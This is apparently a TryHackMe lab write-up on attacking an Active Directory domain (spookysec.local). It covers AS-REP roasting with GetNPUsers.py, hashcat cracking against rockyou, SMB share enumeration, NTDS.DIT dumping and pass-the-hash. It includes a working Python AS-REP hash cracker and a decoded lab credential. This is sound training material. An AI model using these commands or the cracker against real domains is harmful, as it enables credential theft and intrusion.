Attacking Active Directory: TryHackMe

[Task2]: Setting up the environment

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install

[Task3]: Network Enumeration

(#1) What tool will allow us to enumerate port 139/445?

(#2) What is the NetBIOS-Domain Name of the machine?

(#3) What invalid TLD do people commonly use for their Active Directory Domain?

[Task4]: Enumerating Users via Kerbrute

(#1) What command within Kerbrute will allow us to enumerate valid usernames?

(#2) What notable account is discovered?

(#3) What other notable account is discovered? (These should jump out at you)

[Task5]: Abusing Kerberos(AS-REP Roasting)

(#1) We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

GetNPUsers.py spookysec.local/svc-admin -no-pass

-no-pass sends an AS-REQ with no pre-authentication data. Because svc-admin has "Do not require Kerberos preauthentication" set, the KDC answers with an AS-REP whose enc-part is encrypted under the account's password-derived key, and GetNPUsers.py prints that enc-part in crackable $krb5asrep$23$... form. If spookysec.local does not resolve from the attacking machine, point the script at the DC with -dc-ip.

The resulting hash type, as hashcat names it, is Kerberos 5 AS-REP etype 23 (etype 23 is RC4-HMAC, keyed with the account's NT hash).

(#3) What mode is the hash?

hashcat -m 18200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force

Mode 18200 is hashcat's "Kerberos 5, etype 23, AS-REP" entry and -a 0 is a straight wordlist attack. --force only suppresses hashcat's safety warnings (typically about an unsupported or outdated OpenCL driver), so leave it off unless hashcat refuses to start without it.
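What mode 18200 actually verifies for each candidate password, shown as an added Python example (this is not code from the room, from impacket or from the original write-up). It reads a GetNPUsers.py line, derives the RC4-HMAC message keys from a candidate's NT hash and checks the HMAC-MD5 checksum over the decrypted enc-part. MD4 and RC4 are implemented by hand because OpenSSL 3 builds of hashlib often ship without them; the sample hash is constructed locally with a made-up password and a stand-in plaintext, and no KDC is contacted.

```python
"""Added example (not from the room or this write-up): what hashcat mode 18200 verifies.
etype 23 is RC4-HMAC (RFC 4757). Its long-term key is the NT hash, MD4 of the
UTF-16LE password, so a candidate is checked by re-deriving the message keys and
comparing the HMAC-MD5 checksum. The sample hash is constructed here; the
password "Autumn2023!" and the plaintext stand-in are made up for the example.
"""
import hashlib
import hmac
import re
import struct

MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (pure Python, since hashlib may lack it)."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        # Rotating (a, b, c, d) after every step gives the RFC's ABCD/DABC/CDAB/BCDA order.
        for i in range(16):
            a = rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)

def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 keystream XOR (KSA + PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def nt_hash(password: str) -> bytes:
    """RC4-HMAC key == NT hash == MD4(UTF-16LE(password)); unsalted, hence fast to crack."""
    return md4(password.encode("utf-16-le"))

# RFC 4757 keys the HMAC with the key-usage number as a 4-byte little-endian
# integer and maps RFC 4120 usage 3 (AS-REP enc-part) to the value 8.
ASREP_USAGE = struct.pack("<I", 8)

def asrep_decrypt(nt: bytes, checksum: bytes, edata: bytes):
    """Return confounder||EncASRepPart if nt is the right key, else None."""
    k1 = hmac.new(nt, ASREP_USAGE, hashlib.md5).digest()   # checksum key
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()      # RC4 key
    plain = rc4(k3, edata)
    ok = hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum)
    return plain if ok else None

def asrep_encrypt(nt: bytes, plaintext: bytes, confounder: bytes = b"\x00" * 8):
    """KDC side of the same scheme, used here only to build a sample offline."""
    data = confounder + plaintext
    k1 = hmac.new(nt, ASREP_USAGE, hashlib.md5).digest()
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, data)

# GetNPUsers.py / hashcat 18200 line: $krb5asrep$23$user@REALM:<checksum>$<edata>
HASH_RE = re.compile(r"\$krb5asrep\$23\$([^:]+):([0-9a-fA-F]{32})\$([0-9a-fA-F]+)")

def parse_asrep_hash(line: str):
    m = HASH_RE.fullmatch(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$23$ hash")
    return m.group(1), bytes.fromhex(m.group(2)), bytes.fromhex(m.group(3))

def crack_asrep(line: str, candidates):
    """Wordlist attack (hashcat -a 0): first candidate whose NT hash verifies."""
    _, checksum, edata = parse_asrep_hash(line)
    for pw in candidates:
        if asrep_decrypt(nt_hash(pw), checksum, edata) is not None:
            return pw
    return None

def make_sample_hash(user: str, realm: str, password: str) -> str:
    """Constructed sample in GetNPUsers.py output format; no KDC is contacted."""
    checksum, edata = asrep_encrypt(nt_hash(password), b"stand-in for the EncASRepPart DER")
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${edata.hex()}"
```

Calling crack_asrep(make_sample_hash("svc-admin", "SPOOKYSEC.LOCAL", "Autumn2023!"), ["password", "letmein", "Autumn2023!"]) returns the made-up password; feeding it a real GetNPUsers.py line and rockyou works the same way, only far slower than hashcat. The derivation is the same for Kerberoasting except that a TGS-REP ticket enc-part uses key usage 2, which is what mode 13100 assumes.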

[Task6]: Enumerating SMB

(#1)What utility can we use to map remote SMB shares?

(#2)Which option will list shares?

(#3)How many remote shares is the server listing?

(#4)There is one particular share that we have access to that contains a text file. Which share is it?

(#5)What is the content of the file?

(#6)Decoding the contents of the file, what is the full contents?

Decoded from base64, the file yields a username and password pair: backup@spookysec.local:backup2517860

[Task7]: Elevating Privileges within the Domain

(#1)What method allowed us to dump NTDS.DIT?

(#2)What is the Administrator's NTLM hash?

(#3)What method of attack could allow us to authenticate as the user without the password?

(#4)Using a tool called Evil-WinRM what option will allow us to use a hash?
